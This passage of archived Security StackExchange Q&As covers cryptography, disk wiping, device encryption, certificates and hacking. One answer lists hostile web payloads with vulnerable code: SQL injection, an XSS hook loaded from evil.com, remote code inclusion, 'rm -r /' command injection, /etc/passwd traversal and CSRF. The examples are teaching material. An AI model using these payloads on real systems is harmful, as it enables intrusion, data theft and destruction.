sensitive to variations between kernel versions -- so even in the absence of any actual countermeasure, it is difficult for a rootkit to reliably reinfect newer kernels upon upgrades. | {
"source": [
"https://security.stackexchange.com/questions/10369",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2742/"
]
} |
10,438 | Is that called a 'round' every time you move your mouse when creating a new volume? I'm talking about the screen with the random numbers during the volume creation process. What is the purpose of doing the random movement? I saw Lastpass is now doing '100,000 rounds', I'm not sure what that means exactly. Brand new to the world of encryption here :) | You are creating something called "entropy". Random number generators within computers can, if implemented within software, only be at best pseudo-random. Pseudo-random number generators (PRNG) start with a seed. If the seed is well-known, then anyone with knowledge of the PRNG algorithm can derive the same values you derived (this is actually really good for things like simulations and the like where you need an element of reproducability -- it is not good for crypto). So you need to start with a non-well-known seed. Traditionally (not for crypto!) this seed was the computer's time of day. However, for crypto, you need much stronger randomness than this. In many commercial environments, there is often the requirement that random number generators (RNGs) are based off of a hardware-based "noise source". This could be things like random network packet data, the number of photons hitting a detector, the speed of air across a sensor, or any combination of things that might be considered TRULY random. Unfortunately, these hardware-based noise sources don't usually find themselves in widespread use in consumer environments. So the next best thing is to pull hardware-based noise from something else. Many encryption systems use a human moving a mouse to acquire this. Even if the human moves the mouse in circles or back and forth, there is usually still enough actual real-world randomness in the mouse path deviation to provide a reasonable level of entropy to seed the PRNG. For real-world examples of entropy from the environment, look no further than the air-splayed balls spinning around in a lottery cage. "Rounds" are not related to entropy gathering and are related to the number of times that a specific algorithm is run through. There is almost always (?) a feedback mechanism allowing one round to affect later rounds. Increasing the number of rounds increases the amount of time it takes to encrypt/decrypt data. This is important as it can seriously de-scale any brute force decryption efforts. Of course, it also slows down the ENCRYPTION efforts as well. | {
"source": [
"https://security.stackexchange.com/questions/10438",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6366/"
]
} |
10,452 | Can anyone explain what is DNS zone transfer attack or give any link, paper? I have already googled, but could not find anything meaningful. | DNS Zone transfer is the process where a DNS server passes a copy of part of it's database (which is called a "zone") to another DNS server. It's how you can have more than one DNS server able to answer queries about a particular zone; there is a Primary DNS server, and one or more Secondary DNS servers, and the secondaries ask the primary for a copy of the records for that zone. A basic DNS Zone Transfer Attack isn't very fancy: you just pretend you are a secondary and ask the primary for a copy of the zone records. And it sends you them; DNS is one of those really old-school Internet protocols that was designed when everyone on the Internet literally knew everyone else's name and address , and so servers trusted each other implicitly. It's worth stopping zone transfer attacks, as a copy of your DNS zone may reveal a lot of topological information about your internal network. In particular, if someone plans to subvert your DNS, by poisoning or spoofing it, for example, they'll find having a copy of the real data very useful. So best practice is to restrict Zone transfers. At the bare minimum, you tell the primary what the IP addresses of the secondaries are and not to transfer to anyone else. In more sophisticated set-ups, you sign the transfers. So the more sophisticated zone transfer attacks try and get round these controls. SANS have a white paper that discusses this further. | {
"source": [
"https://security.stackexchange.com/questions/10452",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
10,464 | Lots of different programs, such as Darik's Boot and Nuke , let you write over a hard drive multiple times under the guise of it being more secure than just doing it once. Why? | Summary: it was marginally better on older drives, but doesn't matter now. Multiple passes erase a tree with overkill but miss the rest of the forest. Use encryption. The origin lies in work by Peter Gutmann, who showed that there is some memory in a disk bit: a zero that's been overwritten with a zero can be distinguished from a one that's been overwritten with a zero, with a probability higher than 1/2. However, Gutmann's work has been somewhat overhyped, and does not extend to modern disks. “The urban legend of multipass hard disk overwrite and DoD 5220-22-M” by Brian Smithson has a good overview of the topic. The article that started it is “Secure Deletion of Data from Magnetic and Solid-State Memory” by Peter Gutmann , presented at USENIX in 1996. He measured data remanence after repeated wipes, and saw that after 31 passes, he was unable (with expensive equipment) to distinguish a multiply-overwritten one from a multiply-overwritten zero. Hence he proposed a 35-pass wipe as an overkill measure. Note that this attack assumes an attacker with physical access to the disk and somewhat expensive equipment. It is rather unrealistic to assume that an attacker with such means will choose this method of attack rather than, say, lead pipe cryptography . Gutmann's findings do not extend to modern disk technologies, which pack data more and more. “Overwriting Hard Drive Data: The Great Wiping Controversy” by Craig Wright, Dave Kleiman and Shyaam Sundhar is a recent article on the topic; they were unable to replicate Gutmann's recovery with recent drives. They also note that the probability of recovering successive bits does not have a strong correlation, meaning that an attacker is very unlikely to recover, say, a full secret key or even a byte. Overwriting with zeroes is slightly less destructive than overwriting with random data, but even a single pass with zeroes makes the probability of any useful recovery very low. Gutmann somewhat contests the article ; however, he agrees with the conclusion that his recovery techniques are not applicable to modern disks: Any modern drive will most likely be a hopeless task, what with ultra-high densities and use of perpendicular recording I don't see how MFM would even get a usable image, and then the use of EPRML will mean that even if you could magically transfer some sort of image into a file, the ability to decode that to recover the original data would be quite challenging. Gutmann later studied flash technologies , which show more remanence. If you're worried about an attacker with physical possession of the disk and expensive equipment, the quality of the overwrite is not what you should worry about. Disks reallocate sectors: if a sector is detected as defective, then the disk will not make it accessible to software ever again, but the data that was stored there may be recovered by the attacker. This phenomenon is worse on SSD due to their wear leveling. Some storage media have a secure erase command (ATA Secure Erase). UCSD CMRR provides a DOS utility to perform this command ; under Linux you can use hdparm --security-erase . Note that this command may not have gone through extensive testing, and you will not be able to perform it if the disk died because of fried electronics, a failed motor, or crashed heads (unless you repair the damage, which would cost more than a new disk). If you're concerned about an attacker getting hold of the disk, don't put any confidential data on it. Or if you do, encrypt it. Encryption is cheap and reliable (well, as reliable as your password choice and system integrity). | {
"source": [
"https://security.stackexchange.com/questions/10464",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6813/"
]
} |
10,529 | So, since Android 3, devices can perform boot-time, on-the-fly encryption/decryption of the application storage area ( NOT the SDcard/removable storage) - essentially full-disk encryption. This requires a password/passphrase/PIN to be set as the screen unlock code and decryption key, unlock patterns cannot be used. I have a suspicion that there is actually no benefit to enabling encryption, mainly because the memory chips that serve as the "hard drive" can't be easily removed like real hard drives in computers. I'm wondering if others can comment on my reasoning. Scenario 1 : Device is lost, or stolen by an opportunistic thief (i.e. unsophisticated) With encryption -> Finder/thief can't gain access With no encryption but with screen lock -> Finder/thief can't gain access Scenario 2 : Device is stolen by a sophisticated attacker, but they must leave no trace of the attack (therefore chip-off methods are excluded and the phone must be returned before the loss is discovered) With encryption -> Finder/thief can't gain access With no encryption but with screen lock -> Finder/thief can't gain access Scenario 3 : Device is stolen by a determined attacker, and the owner made to reveal the passcode under duress. Android doesn't have Truecrypts plausible deniability features. With encryption -> Attacker gains access With no encryption but with screen lock -> Attacker gains access Are there any scenarios I've missed? So my conclusion is that there is no point to enabling full device encryption on Android - a screen lock will do. Discuss! (I am quite happy to be proven wrong, I just can't see how there is a benefit to it) | The advantages are limited, but there are nonetheless scenarios where encryption helps. In any scenario where the attacker obtains the password¹ (with lead pipe cryptography , or far more realistically by reading the unlock pattern on the screen or brute force on the PIN), there is clearly no advantage to full disk encryption. So how could the attacker obtain the data without obtaining the password? The attacker might use a software vulnerability to bypass the login screen. A buffer overflow in adbd , say. The attacker may be able to access the built-in flash memory without booting the device. Perhaps through a software attack (can the device be tricked into booting from the SD card? Is a debug port left open?); perhaps through a hardware attack (you postulate a thief with a lead pipe, I postulate a thief with a soldering iron). Another use case for full-disk encryption is when the attacker does not have the password yet. The password serves to unlock a unique key which can't be brute-forced. If the thief unwittingly lets the device connect to the network before unlocking it, and you have noticed the theft, you may be able to trigger a fast remote wipe — just wipe the key, no need to wipe the whole device. (I know this feature exists on recent iPhones and Blackberries; presumably it also exists or will soon exist on Android devices with full-disk encryption.) If you're paranoid, you might even trigger a key wipe after too many authencation failures. If that was you fumbling, you'd just restore the key from backup (you back up your key, right? That's availability 101). But the thief is a lot less likely to have access to your backup than to your phone. ¹ Password, passphrase, PIN, passgesture, whatever. | {
"source": [
"https://security.stackexchange.com/questions/10529",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/1811/"
]
} |
10,538 | I'm working on a web site with a several levels of subdomains. I need to secure all of them with SSL, and I'm trying to determine the correct certificate strategy. Here's what I need to secure: foo.com www.foo.com Any combination of city.state.foo.com. (These are US states.) My understanding is that a wildcard certificate can only cover one "level" of subdomain. According to RFC 2818 : Names may contain the wildcard character * which is considered to
match any single domain name component or component fragment. E.g.,
*.a.com matches foo.a.com but not bar.foo.a.com.
f*.com matches foo.com but not bar.com. What I think I need is the following certificates: *.foo.com , which will match, for example, foo.com , www.foo.com . (Though I'm not clear on whether *.a.com matches a.com by itself.) *.ny.foo.com to match new-york.ny.foo.com , buffalo.ny.foo.com , etc. I will eventually need 50 such certificates to match all the states, once our site expands to serve them all. My questions are: Is this scheme correct? In the scenario above, if a user visits ca.foo.com , will they get the certificate for *.foo.com or for *.ca.foo.com ? How can I ensure that users see all of these subdomains as legitimately owned by us? For example, if a user visits foo.com , then mountain-view.ca.foo.com , and those are different certificates, will they get a warning? Is there some way to assure their browser that these certificates share the same owner? | Theoretically: a * matches exactly one level (hence *.foo.com does not match foo.com ) but you can have several * in a name Hence, if all SSL implementations faithfully follow RFC 2818 , you just need three certificates, with names: foo.com *.foo.com *.*.foo.com and, if the implementations are really good at sticking with RFC 2818 and the intricacies of X.509, you could even use a single certificate which lists the three strings above in its Subject Alt Name extension. Now, theory and practice perfectly match... in theory. You may have surprises with what browsers actually do. I suggest you try it out; some example certificates can be created with the OpenSSL command-line tool (see for instance this page for a few guidelines). | {
"source": [
"https://security.stackexchange.com/questions/10538",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/4596/"
]
} |
10,617 | I came across the term "cryptographic oracle" and despite a bit of googling I was unable to come across a clear, concise definition. What is a cryptographic oracle and what does it do? Can anyone give an example? | An oracle is an individual who knows the personal cell phone number of a god. This enables him (or her) to obtain some information which is usually considered as out of reach of mere mortals, such as glimpses of the future. In cryptography, that's the same, except that no deity is involved: an oracle is any system which can give some extra information on a system, which otherwise would not be available. For instance, consider asymmetric encryption with RSA . The standard I link to states how a piece of data should be encrypted with a public key. In particular, the encryption begins with a padding operation, in which the piece of data is first expanded by adding a header, so that the padded data length matches the RSA public key length. The header should begin with the two bytes 0x00 0x02 , followed by at least eight random non-zero bytes, and then another 0x00 . Once the data has been padded, it is time to apply the mathematical operation which is at the core of the RSA operation (modular exponentiation). Details of the padding are important for security. The encryption result is an integer modulo the RSA modulus , a big integer which is part of the public key. For a 1024-bit RSA key, the modulus n is an integer value greater than 2 1023 , but smaller than 2 1024 . A properly encrypted data chunk, with RSA, yields an integer value between 1 and n-1 . However, the padding implies some structure , as shown above. The decrypting party MUST find, upon decryption, a properly formed PKCS#1 header, beginning with the 0x00 0x02 bytes, followed by at least eight non-zero bytes, and there must be a 0x00 which marks the end of the header. Therefore, not all integers between 1 and n-1 are valid RSA-encrypted message (less than 1 every 65000 such integers would yield a proper padding upon decryption). Knowing whether a given integer modulo n would yield, upon decryption, a valid padding structure, is supposed to be infeasible for whoever does not know the private key. The private key owner (the deity) obtains that information, and much more: if the decryption works, the private key owner actually gets the message, which is the point of decryption. Assume that there is an entity, somewhere, who can tell you whether a given integer modulo n is a validly encrypted piece of data with RSA; that entity would not give you the full decryption result, it would just tell you whether decryption would work or not. That's a one-bit information, a reduced glimpse of what the deity would obtain. The entity is your oracle: it returns parts of the information what is normally available only to the private key owner. It turns out that, given access to such an oracle, it is possible to rebuild the private key, by sending specially crafted integers modulo n (it takes a million or so of such values, and quite a bit of mathematics, but it can be done). It also turns out that most SSL/TLS implementation of that time (that was in 1999) were involuntarily acting as oracles: if you sent, as a client, an invalidly RSA-encrypted ClientKeyExchange message, the server was responding with a specific error message ("duh, your ClientKeyExchange message stinks"), whereas if decryption worked, the server was keeping on with the protocol, using whatever value it decrypted (usually unknown to the client if the client sent a random value, so the protocol failed later on, but the client could see the difference between a valid and an invalid padding). Therefore, with such an implementation, an attacker could (after a million or so of failed connections) rebuild the server private key, which is usually considered to be a bad thing. That's what oracles are: a mathematical description of a data leak, to be used in security proofs. In the case of RSA, this demonstrates that knowing whether a value has a proper padding or not is somehow equivalent to learning the private key (if you know the private key you can attempt the decryption and see the padding for yourself; the Bleichenbacher attack shows that it also works the other way round). | {
"source": [
"https://security.stackexchange.com/questions/10617",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/1801/"
]
} |
10,643 | I've heard that if your PC is turned off, then an attacker can recover the RAM from the last session. I find this hard to believe. How could it be done? | There is an element of truth to this one - an attack was discovered which took advantage of data remanence in RAM, allowing an attacker to grab data from the RAM in a machine. There was a very short timeframe (a matter of seconds or minutes) in which to do this, but it wasn't a hack of the PC as such. Simple Wikipedia link to Cold Boot Attack here And the McGrew link here giving more detail | {
"source": [
"https://security.stackexchange.com/questions/10643",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6731/"
]
} |
10,646 | Recent version of PHP 5.3.9 has been released a couple days ago, and Hash Collisions have been fixed, most of the servers actually didn't upgrade their server until now, including my website's server. In this article I came across a part that has been told sites that are in a shared hosting can't upgrade their PHP by their own I know about that, but I'm wondering isn't that possible to use ini_set to set max_input_vars to secure your site (not server)? I know that if someone attacks to the server the whole site will be down, but by setting the max_input_vars at least my site will be safe if somebody attack my site. Is this correct? | There is an element of truth to this one - an attack was discovered which took advantage of data remanence in RAM, allowing an attacker to grab data from the RAM in a machine. There was a very short timeframe (a matter of seconds or minutes) in which to do this, but it wasn't a hack of the PC as such. Simple Wikipedia link to Cold Boot Attack here And the McGrew link here giving more detail | {
"source": [
"https://security.stackexchange.com/questions/10646",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6142/"
]
} |
10,872 | I often see passphrase suggestions written as a sentence, with spaces. In that format are they more susceptible to a dictionary attack because each word is on it's own as opposed to a large unbroken 20+ character 'blob'? | No (with a minor exception at the bottom). The passphrases "correct horse battery staple" and "correcthorsebatterystaple" are equivalent entropy-wise. Choosing to put spaces in an incorrect spot or sometimes including spaces and sometimes not including spaces will give you a few extra bits of entropy; but its not worth it for the extra difficulty remembering it. You'd gain a few bits of entropy for the entire passphrase for weird spacing pattern; while just adding another word would add about 13 bits (assuming a diceware dictionary of 7776 words corresponding to 5 rolls of a six-sided dice; note that lg(6 5 ) = 12.92; lg being the base-2 logarithm). (There's no disagreement between my answer and Thomas's; an attacker would have to check for passphrases both with and without spaces unless he had extra information about whether you tended to use spaces in your passphrases). Beware the distinction between random words and meaningful sentences. A passphrase "quantum mechanics is strange" is much lower entropy than say "heat fudge scott canopy"? Why? In meaningful English you have patterns like certain words combine frequently (quantum mechanics) or certain patterns must appear to be grammatically correct (subject, predicate, subject complement) that in principle could be exploited by a sufficiently sophisticated attacker ( even though I am not aware of any cracking algorithms that currently utilize this ). The informational entropy of grammatically correct written English is about 1 bit per character so the first passphrase has ~30 bits [1] , while the second passphrase has about 4×12.9 ≅ 52 bits of entropy; so would take about 2 22 ≅4 million times longer to crack. Be wary of incorrect analyses like http://www.baekdal.com/insights/password-security-usability that make many fundamental information theory mistakes. E.g., "this is fun" is incredibly weak being comprised of some of the most common English words in a syntatically correct sentence that is very common ('this' ~ 23rd most common; 'is' ~ 7th most common; 'fun' ~ 856th most common word) [2] . If you tested just three random words from the top 1000 english words, it would take you only 1 second to crack it, assuming a modern GPU and you have acquired the (salted) hash. This is roughly equivalent to a 5 random alphanumeric characters (not counting special symbols). If you search google for the quoted phrase "this is fun" it appears 228 million times. EDIT: Minor exception: in the rare case when consecutive words in your passphrase form another word in your dictionary (or your attacker's dictionary), then not having spaces (or another separator) between words lowers your passphrase's entropy significantly. For example, if the random words forming your passphrase were "book case the rapist" and you had no spaces, an attacker could get in by trying all combinations of just two words 'bookcase therapist'. | {
"source": [
"https://security.stackexchange.com/questions/10872",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6366/"
]
} |
10,949 | My model is one where I have several clients which wish to speak with some (but not all) of the other clients. All messages will be sent through a server. Only the two clients communicating with each other should be able to know the message. So the server AND the other clients should not be able to work out what message was sent. Communication between two clients may start and end several times a day. Messages will be plaintext with potentially unlimited length, but likely to be much less, think SMS style messages. Given these circumstances, how should I encrypt the messages? I don't mind writing extra code if it leads to better speed or efficiency. I know the rough basics of how RSA and AES work but I can't figure out what is best. When you generate a public/private key pair for RSA, is there any situation where you would need to generate a new pair? Or can one client have one public key and give the same key to anyone that wants to talk to him and only him be able to (ever) read the messages, but they store the public key for all future messages? Or should I have a separate symmetric AES key for pair of clients and simply share that when contact is first initiated and use that forever. Again, is there any circumstance where this would need to be generated again? How would I store the key(s) so they persist if client crashes/shutsdown/reboots? | Neither, unless it's both. You're asking the wrong question . You should not be thinking about a cryptographic algorithm at this stage, but about a cryptographic protocol. Cryptographic protocols are hard to design, and a frequent source of security bugs. You don't fully understand public-key cryptography, so you aren't ready to use it in your own cryptographic protocol. At a high level, your model is amenable to public-key cryptography (e.g. RSA). Let every client have its own private key and publish its public key to the other client. A client's private key does not change over time, unless the client has been compromised. Symmetric cryptography (e.g. AES) would not scale well here because each pair of clients would need to have its own secret key. Use existing software whenever possible. Implementing cryptographic protocols is almost as tricky as designing them. For a model where clients occasionally send messages to one another, email-style, a tool that would work well is GnuPG . (For bidirectional communications, use SSL/TLS .) So: for day-to-day operation, to send a message, call gpg , encrypt with the public key of the recipient, and while you're at it sign with the private key of the sender. When receiving a message, check the signature against the purported sender's public key, and decrypt with the private key of the receiver. In other words, send with gpg --sign --encrypt -r NAME_OF_RECIPIENT and receive with gpg --verify followed by gpg --decrypt . The remaining problem is that of key distribution. After a client has generated its key pair, it needs to inform the other clients about it and distribute it without allowing the public key to be intercepted and replaced in transit by an attacker. How to do this depends a lot of your precise scenario. Don't neglect the security of this part. If, and only if, invoking GnuPG proves to be too slow, then consider using a lighter-weight, perhaps home-made implementation of a similar protocol (going from e-mail range overhead to SMS range overhead). Under the hood, GnuPG generates a symmetric key for each message, because public-key cryptography is expensive for large messages; the public key algorithm is only used to encrypt the symmetric key and to sign a digest of the file. You should follow this model. Using AES for symmetric encryption, SHA-256 as the digest algorithm and RSA as the public key algorithm is a good choice. | {
"source": [
"https://security.stackexchange.com/questions/10949",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/157440/"
]
} |
10,974 | What is the meaning of SQL injection? I am not able to understand the term. And what problems may be caused by SQL injection? | SQL injection most commonly happens when a programmer builds an SQL command by appending together (or interpolating) strings, using user-supplied input. e.g. Imagine this extract from a vulnerable piece of user authentication (login) pseudocode from a fictional web application. username = getPostData( "username" );
password = getPostData( "password" );
sql = "select id, username from users'
+ ' where username='" + username + "' and password='" + password +"'";
result = executeQuery( sql );
if (result[ 0 ]) {
loginUser( result[ 0 ][ 'id' ] );
print "You are logged in as " + encodeAsHtml( result[ 0 ][ 'username' ] );
} At first glance you may think this looks sensible, but the problem is that it makes no distinction between the user-supplied data and the SQL code; data can be treated as code . This means that a malicious user can change the logic of the SQL statement. A malicious user could completely bypass the login protection if he could change the logic of the SQL command to produce an answer that guarantees at least one row is always returned. For example, if he entered a real username bob , but put the password as: ' or 1=1 -- Then this would grant him access to someone else's account. This is because the resultant SQL would look like this: select id, username
from users
where username='bob' and password='' or 1=1 --' Note that the logical expression 1=1 always evaluates to true. Also note that the injection vector ended with two hyphens, which marks the rest of the line as a comment. Thus the SQL is logically the same as select id, username
from users
where (username='bob' and password='') or true which is logically the same as select id, username
from users
where true which is logically the same as select id, username
from users Thus, all the users in the database will be returned, and he will be logged in as the first one in the list - which is usually the administrator. Also SQL injection can be used to read the all data out of the database. Entering the username as follows (SQL Server syntax) will list the user-defined table names ' union select -1, name, from sysobjects where xtype = 'U' order by id -- because this produces select id, username
from users
where username = ''
union
select -1, name
from sysobjects
where xtype = 'U'
order by id asc because our injected data has an id of -1 and we are sorting the data by id, the first row returned from the database will be our select in the sysobjects table. So our displayed " username " will now be the name of the first user-created table in the database. Similar techniques can be repeated to read out all the data of every column of every row of every accessible table. Please note that this can still be done even when the feature being attacked produces no output at all! Some combinations of programming language database libraries and DBMSs also allow query-stacking . This is a technique where a whole new SQL command is appended on the end. The database will then execute both queries. Username: '; delete from users -- produces select id, username
from users
where username='';
delete from users Now your application doesn't have any users (and requires SQL injection to log in).
See mandatory XKCD comic . See this SQLi cheat sheet if you are interested in more techniques commonly used by attackers and vulnerability testers. So how do I avoid this? Actually, in many common scenarios, it is so easy. Prepared statements separate data from code and do not allow parameters to be treated as SQL code. Simply recode your query to use prepared statements and bind individual parameters to the placeholders. in pseudocode: username = getPostData( "username" );
password = getPostData( "password" );
sql = "select id, username from users where username=? and password=?";
query = prepareStatement( sql );
query.setParameter( 0, username );
query.setParameter( 1, password );
result = executePreparedStatement( query ); As always this isn't the whole story... Don't forget to defend in depth and always do input validation too, as you always would (should). WHERE clauses need extra attention as special characters such as % may not be wanted. Be particularly careful when passing user-data as arguments to database functions and be aware how they can be abused. If you have stored procedures that generate dynamic queries you may need further protection within the procedures themselves. | {
"source": [
"https://security.stackexchange.com/questions/10974",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8047/"
]
} |
11,025 | My boss just asked me to create a fictitious log entry to say that a user's account was updated before it was, to win a dispute. I feel this is not right because I am trying to start a career in working with data technology. Whether or not I get caught, the integrity of my data will be questionable, and my character compromised. What would be the best way to handle this? I have a far more professional company wanting to pick me up, and they are willing to hold the position for me until I finish the project at my current job. We are roughly a month out; should I cut and run now? Sorry this is a little off topic, but I know some established professionals frequent here, and just need to know the best way to go about handling this with character. This question was IT Security Question of the Week . Read the Mar 30, 2012 blog entry for more details or submit your own Question of the Week. | Ask your boss to put the request in writing before you do it. Make sure to keep a copy of the request in your own personal files. Ideally a paper copy at home, or maybe an email in your own personal email account. You say that you already have a better job to go to, so just give your notice now and leave the company as soon as the notice period is up. Presumably you have a notice period? A contract of employment? If you don't have a better job to go to, then find one as fast as you can. | {
"source": [
"https://security.stackexchange.com/questions/11025",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
11,117 | A friend of mine just started a job at a security sensitive company. They've provided him with a laptop with Windows XP Professional installed. He's heard a rumor from other employees that the laptops may have key loggers installed. Is there any way for him to confirm or disprove this allegation? Will this be as simple as looking at the process tree or registry, or do these kinds of key loggers hide themselves better than that? He does have administrator rights. | This would greatly depend on the implementation of the keylogger. Some enterprise-level products do include rootkits which make the keylogger nearly impossible to detect, unless you know the product in use and its configuration. For an example, check out Spector Pro *. Also, as syneticon-dj notes , it's possible they may instead be using a hardware keylogger which could be implemented in a way that cannot be easily detected by software. If they've given your friend full admin rights on the box, they're either really confident in their monitoring and configuration control capabilities or they're fairly ignorant to the implications of giving such privileges to an end-user. Often times, it's the latter. But, if you presume the former to be the case, then you should also presume there's some solid justification for their confidence. Regardless, it's very likely that your friend has already signed (and thereby agreed to) an Acceptable Use Policy which includes a clause that relinquishes all rights to privacy on company-owned equipment. Further, any company worried about compliance in these matters will also have a Warning Banner on the system which reminds users at each log-in that they may be subject to monitoring on those systems. Bottom line: Don't do anything on company equipment that you don't want them to see. Always presume that they are logging keystrokes, capturing screenshots (another common spyware feature), and monitoring network traffic with the possible inclusion of an SSL proxy. Keep business on business hardware, and personal stuff on personal hardware, and you should be fine. * Note: This is not an endorsement of Spector Pro. I have no affiliations with the company, nor have I used their product. This is simply given as an example of what sort of spyware tools are available to corporations. | {
"source": [
"https://security.stackexchange.com/questions/11117",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7273/"
]
} |
11,221 | I will be using scrypt to store passwords in my application. As such, I'll be using SHA-256 and Salsa20 crypto primitives (with PBKDF2). Having that in mind, how big salt should I use?
Should it be equal to the size of SHA-256 output: 256bits or should it be equal to number of bits I'll take from this password stretching function: 512bits? Considering that SSHA as used by OpenLDAP has only 32bit salt and Linux crypt() uses 48bit salt my salts would seem fairly large... In general: What is the rule of thumb for size of salt? Related: What should be used as a salt? What is a good enough salt for a SaltedHash? | Salts must be unique ; that's their one and only job. You should strive, as much as possible, to never reuse a salt value; the occasional reuse is rarely critical but should still be avoided). With reasonably designed password schemes, there is no other useful property in salts besides uniqueness; you can choose them however you want as long as you do not reproduce the exact same sequence of bits. Uniqueness must be understood worldwide. (With badly designed password hashing schemes, the salt might have some required additional properties, but if you use a badly design password scheme you already have bigger problems. Note that a salt is not exactly the same as an Initialization Vector for symmetric encryption, where strict requirements like unpredictable uniform randomness typically apply.) A common way to have more-or-less unique salt values is to generate them randomly, with a good generator (say, one which is fit for cryptographic usages, like /dev/urandom ). If the salt is long enough, risks of collisions (i.e. reusing a salt value) are low. If you use n -bit salts, chances of a collision become non-negligible once you reach about 2 n/2 generated values. There are about 7 billions people on this planet, and it seems safe to assume that they, on average, own less than 1000 passwords each, so the worldwide number of hashed passwords must be somewhat lower than 2 42.7 . Therefore, 86 bits of salt ought to be enough. Since we kind of like so-called "security margins", and, moreover, since programmers just love powers of two, let's go to 128 bits . As per the analysis above, that's more than enough to ensure worldwide uniqueness with high enough probability, and there is nothing more we want from a salt than uniqueness. Uniqueness can also be ensured through other means, e.g. using as salt the concatenation of the server name (the worldwide DNS system already ensures that everybody can get his own server name, distinct from that of anybody else on the planet) and a server-wide counter. This raises some practical issues, e.g. maintaining a counter value which does not repeat, even in the case of an ill-timed server crash&reboot, and/or several front-ends with load balancing. A random fixed-length salt is easier. | {
"source": [
"https://security.stackexchange.com/questions/11221",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/3306/"
]
} |
11,234 | I am specifically talking about web servers, running Unix. I have always been curious of how hackers get the entry point. I mean I don't see how a hacker can hack into the webpage when the only entry method they have into the server is a URL. I must be missing something, because I see no way how the hacker can get access to the server just by changing the URL. By entry point I mean the point of access. The way a hacker gets into the server. Could I get an example of how a hacker would make an entry point into a webserver? Any C language is acceptable. I have absolutely no experience in hacking A simple example would be appreciated. | Hacks that work just by changing the URL One legit and one malicious example Some examples require URL encoding to work (usually done automatically by browser) SQL Injection code: $username = $_POST['username'];
$pw = $_GET['password'];
mysql_query("SELECT * FROM userTable WHERE username = $username AND password = $pw"); exploit (logs in as administrator without knowing password): example.com/?username=Administrator&password=legalPasswordThatShouldBePostInsteadOfGet
example.com/?username=Administrator&password=password' or 1=1-- Cross Site Scripting (XSS) code: $nickname= $_GET['nickname'];
echo "<div>Your nickname is $nickname</div>\n"; exploit (registrers visiting user as a zombie in BeEF ): example.com/?nickname=Karrax
example.com/?nickname=<script src="evil.com/beefmagic.js.php" /> Remote code execution code (Tylerl's example): <? include($_GET["module"].".php"); ?> exploit (downloads and runs arbitrary code) : example.com/?module=frontpage
example.com/?module=pastebin.com/mymaliciousscript Command injection code: <?php
echo shell_exec('cat '.$_GET['filename']);
?> exploit (tries to delete all files from root directory): example.com/?filename=readme.txt
example.com/?filename=readme.txt;rm -r / Code injection code: <?php
$myvar = "varname";
$x = $_GET['arg'];
eval("\$myvar = \$x;");
?> exploit (injects phpinfo() command which prints very usefull attack info on screen): example.com/?arg=1
example.com/?arg=1; phpinfo() LDAP injection code: <?php
$username = $_GET['username'];
$password = $_GET['password'];
ldap_query("(&(cn=$username)(password=$password)")
?> exploit (logs in without knowing admin password): example.com/?username=admin&password=adminadmin
example.com/?username=admin&password=* Path traversal code: <?php
include("./" . $_GET['page']);
?> exploit (fetches /etc/passwd): example.com/?page=front.php
example.com/?page=../../../../../../../../etc/passwd Redirect/Forward attack code: <?php
$redirectUrl = $_GET['url'];
header("Location: $redirectUrl");
?> exploit (Sends user from your page to evil page) : example.com/?url=example.com/faq.php
example.com/?url=evil.com/sploitCode.php Failure to Restrict URL Access code: N/A. Lacking .htaccess ACL or similar access control. Allows user to guess or by other
means discover the location of content that should only be accessible while logged in. exploit: example.com/users/showUser.php
example.com/admins/editUser.php Cross-Site Request Forgery code: N/A. Code lacks page to page secret to validate that request comes from current site.
Implement a secret that is transmitted and validated between pages. exploit: Legal: example.com/app/transferFunds?amount=1500&destinationAccount=4673243243
On evil page: <img src="http://example.com/app/transferFunds?amount=1500
destinationAccount=evilAccount#" width="0" height="0" /> Buffer overflow (technically by accessing an URL, but implemented with metasploit code: N/A. Vulnerability in the webserver code itself. Standard buffer overflow Exploit (Metasploit + meterpreter?): http://www.exploit-db.com/exploits/16798/ | {
"source": [
"https://security.stackexchange.com/questions/11234",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
11,313 | How do you destroy an old hard drive? To be clear, unlike questions Secure hard drive disposal: How to erase confidential information and How can I reliably erase all information on a hard drive? I do not want to erase the data and keep the hard drive, I want to get rid of the hard drive for good. It's old, small, may (or may not) contain personal information, and is not connected to a computer (a step I prefer to avoid). I might as well destroy it because it is easier and more certain that the data is destroyed too. Any other advice is also appreciated as an answer. Keep in mind I am looking for an easier and more reliable data-destroying solution than wiping drives. | Physical destruction of a drive is tricky business. There are many companies that deal specifically in the field of data destruction, so if you are doing any kind of mass you may want to at least look at their price list. If you contract, make sure the company is properly bonded/insured, and provides audit trails for each destroyed item. In the worst case scenario that your information does get out, you want the document in hand that says your contractor properly destroyed the item in question. Then, at least, you can transfer the liability. When it comes to drive destruction you typically see one of two main fields: Disk Degaussing Physical Destruction Degaussing Degaussing used to be the norm, but I am not such a big fan. On the plus side it is fast, you'll normally just dump the disks on a conveyor belt and watch them get fed through the device. The problem is auditability. Since the circuitry is rendered wobbly, you won't be able to do a spot check of the drives and verify that the data is gone. It is possible, with some level of probability unknown to me, that data could still exist on the platters. Retrieving the data would, without question, be difficult, but the fact still remains that you cannot demonstrate the data is actually gone. As such, most companies now will actually be doing physical destruction. Physical Destruction At the low end, say a small box of drives at a time, you'll have hard drive crushers. They're often pneumatic presses that deform the platters beyond useful recognition. At the risk of supporting a specific product, I have personally used this product from eDR . It works well, and is very cathartic. At a larger scale, say dozens or hundreds of disks, you'll find large industrial shredders . They operate just like a paper shredder, but are designed to process much stiffer equipment. The mangled bits of metal that are left over are barely identifiable as hard drives. At an even larger scale you can start looking at incinerators that will melt the drives down to 